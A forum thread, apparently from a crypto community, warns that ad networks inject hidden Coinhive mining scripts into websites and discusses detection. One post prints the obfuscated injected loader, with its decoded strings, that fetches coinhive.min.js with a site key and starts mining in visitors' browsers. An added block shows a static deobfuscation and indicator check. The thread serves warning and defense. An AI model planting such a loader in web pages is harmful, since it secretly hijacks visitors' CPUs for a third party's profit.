Topic: Warning: potential malicious code originating from advertising network (Read 154 times)

newbie
Activity: 3
Merit: 0
NoScript is quite good for protecting your browser; I run it alongside Adblock Plus. This is true though, I've seen ad content which will download and execute trojans also.
full member
Activity: 224
Merit: 103
legendary
Activity: 3234
Merit: 5637
I'd encourage anybody who's using crypto ad networks to check your websites for potential malicious code.

Install an extension such as Minerblock and load your website.

I don't have any external scripts running apart from the one used by a well-known ad network, yet I was infected with a sneaky coinhive injection on this file: 'wp-includes/js/jquery/jquery.js'.

Please report your findings here. I won't disclose the network until we have more evidence.

There are a lot of mining scripts hidden in ads. I noticed this because my antivirus/firewall blocks all of them and gives me a notice every time. I also asked some faucet owners about mining on their sites, but some of them say they never enabled such things, so it is obvious that it is hidden in the ads.

I do not know if it is possible to remove that code without removing the ads, but it is not nice to use someone's CPU in this way. It seems that the earnings from crypto-related ad networks are going down and they are looking for a way to get some extra profit.
member
Activity: 109
Merit: 100
Web Developer
Quote:
Thanks for the warning

When it's not Microsoft leaving back doors open it's Google, and they both share the same paymasters whose name we dare not mention

This is likely not Google, probably smaller crypto-based networks (Coinzilla, a-ads etc.).

Would be great if OP could clarify which network the ad was being served from so people can blacklist them.
full member
Activity: 224
Merit: 103
I hope more evidence will be posted so more people will be aware especially as we visit sites daily related to crypto. I have Adblock on my browser but even then have not been aware of surreptitious coinhive injections in sites I visit. Thanks for the heads-up.
member
Activity: 210
Merit: 26
High fees = low BTC price
Thanks for the warning

When it's not Microsoft leaving back doors open it's Google, and they both share the same paymasters whose name we dare not mention
newbie
Activity: 10
Merit: 3
Here's the relevant code if anyone is interested:

Code:
var _0x7a2c = ["\x73\x63\x72\x69\x70\x74", "\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74", "\x74\x79\x70\x65", "\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74", "\x73\x72\x63", "\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65", "\x6F\x6E\x6C\x6F\x61\x64", "\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64", "\x68\x65\x61\x64", "\x68\x74\x74\x70\x73\x3A\x2F\x2F\x63\x6F\x69\x6E\x68\x69\x76\x65\x2E\x63\x6F\x6D\x2F\x6C\x69\x62\x2F\x63\x6F\x69\x6E\x68\x69\x76\x65\x2E\x6D\x69\x6E\x2E\x6A\x73", "\x4B\x34\x4B\x35\x5A\x78\x63\x54\x33\x42\x6A\x62\x78\x44\x43\x42\x42\x56\x6A\x39\x37\x32\x47\x62\x51\x57\x76\x32\x6B\x55\x4E\x55", "\x73\x74\x61\x72\x74"];

function loadScript(_0xca68x2, _0xca68x3) {
    var _0xca68x4 = document[_0x7a2c[1]](_0x7a2c[0]);
    _0xca68x4[_0x7a2c[2]] = _0x7a2c[3];
    _0xca68x4[_0x7a2c[4]] = _0xca68x2;
    _0xca68x4[_0x7a2c[5]] = _0xca68x3;
    _0xca68x4[_0x7a2c[6]] = _0xca68x3;
    document[_0x7a2c[8]][_0x7a2c[7]](_0xca68x4)
}
loadScript(_0x7a2c[9], function() {
    var _0xca68x5 = new CoinHive.Anonymous(_0x7a2c[10], {
        threads: 4
    });
    _0xca68x5[_0x7a2c[11]]()
});

If you decode var _0x7a2c using a service like http://ddecode.com/hexdecoder/, you'll get this:

Code:
var _0x7a2c = ["script", "createElement", "type", "text/javascript", "src", "onreadystatechange", "onload", "appendChild", "head", "https://coinhive.com/lib/coinhive.min.js", "K4K5ZxcT3BjbxDCBBVj972GbQWv2kUNU", "start"];
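The decoding the poster did by hand can be done statically, without ever running the injected script. The following is an added example (not code from the thread or from any poster): it locates the `_0xNNNN` string table, decodes the `\xHH` escapes, inlines every `_0x7a2c[n]` reference so the loader reads as plain JavaScript, and then checks the result for known browser-miner indicators. The SAMPLE input is constructed from a trimmed version of the posted snippet, with the site key replaced by a placeholder; the indicator list is an assumption of the example.

```javascript
// Added example, not code from the thread. Statically decodes the `_0xNNNN`
// string-table obfuscation so the loader can be read and triaged without
// executing it. SAMPLE is constructed from the posted snippet (trimmed, key replaced).
const SAMPLE = String.raw`var _0x7a2c = ["\x73\x63\x72\x69\x70\x74", "\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74", "\x73\x72\x63", "\x68\x74\x74\x70\x73\x3A\x2F\x2F\x63\x6F\x69\x6E\x68\x69\x76\x65\x2E\x63\x6F\x6D\x2F\x6C\x69\x62\x2F\x63\x6F\x69\x6E\x68\x69\x76\x65\x2E\x6D\x69\x6E\x2E\x6A\x73", "\x73\x74\x61\x72\x74"];
var s = document[_0x7a2c[1]](_0x7a2c[0]); s[_0x7a2c[2]] = _0x7a2c[3];
new CoinHive.Anonymous("SITE-KEY-PLACEHOLDER")[_0x7a2c[4]]();`;

// Strings a reviewer would expect in a browser-miner loader (assumed list for this example).
const MINER_INDICATORS = ["coinhive.com", "CoinHive.Anonymous", "coin-hive", "crypto-loot"];

// Resolve \xHH, \uHHHH and simple backslash escapes inside a JS string literal body.
function unescapeJs(s) {
  return s.replace(/\\x([0-9A-Fa-f]{2})|\\u([0-9A-Fa-f]{4})|\\(.)/g, (m, x, u, c) =>
    x !== undefined ? String.fromCharCode(parseInt(x, 16))
    : u !== undefined ? String.fromCharCode(parseInt(u, 16))
    : ({ n: "\n", t: "\t", r: "\r" })[c] || c);
}

// Find the first `var _0x... = [ "...", ... ]` table and decode its entries.
// Assumes the literals contain no ']' (true for the posted sample).
function decodeStringArray(src) {
  const decl = /var\s+(_0x[0-9a-fA-F]+)\s*=\s*\[([^\]]*)\]\s*;?/.exec(src);
  if (!decl) return null;
  const strings = [];
  const lit = /"((?:[^"\\]|\\.)*)"|'((?:[^'\\]|\\.)*)'/g;
  for (const m of decl[2].matchAll(lit)) strings.push(unescapeJs(m[1] !== undefined ? m[1] : m[2]));
  return { name: decl[1], strings, declaration: decl[0] };
}

// Inline every NAME[i] as its decoded literal, then rewrite obj["prop"] as obj.prop.
function deobfuscate(src) {
  const table = decodeStringArray(src);
  if (!table) return src;
  const ref = new RegExp(table.name + "\\[(\\d+)\\]", "g");
  return src
    .replace(table.declaration, () => "/* decoded string table: " + JSON.stringify(table.strings) + " */")
    .replace(ref, (m, i) => (i < table.strings.length ? JSON.stringify(table.strings[i]) : m))
    .replace(/\["([A-Za-z_$][\w$]*)"\]/g, ".$1");
}

// Report which known miner indicators appear in the readable source.
function findMinerIndicators(readable) {
  return MINER_INDICATORS.filter((ind) => readable.includes(ind));
}

const readable = deobfuscate(SAMPLE);
console.log(readable);
console.log("indicators:", findMinerIndicators(readable));
```

Running it against a suspect file such as the modified jquery.js mentioned above would print the loader in plain form (`document.createElement("script")`, the coinhive.com URL, `.start()`), which is what an operator needs to confirm the injection and to search the rest of the site for the same table name.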
newbie
Activity: 10
Merit: 3
Quote:
I'd encourage anybody who's using crypto ad networks to check your websites for potential malicious code.

Install an extension such as Minerblock and load your website.

I don't have any external scripts running apart from the one used by a well-known ad network, yet I was infected with a sneaky coinhive injection on this file: 'wp-includes/js/jquery/jquery.js'.

Please report your findings here. I won't disclose the network until we have more evidence.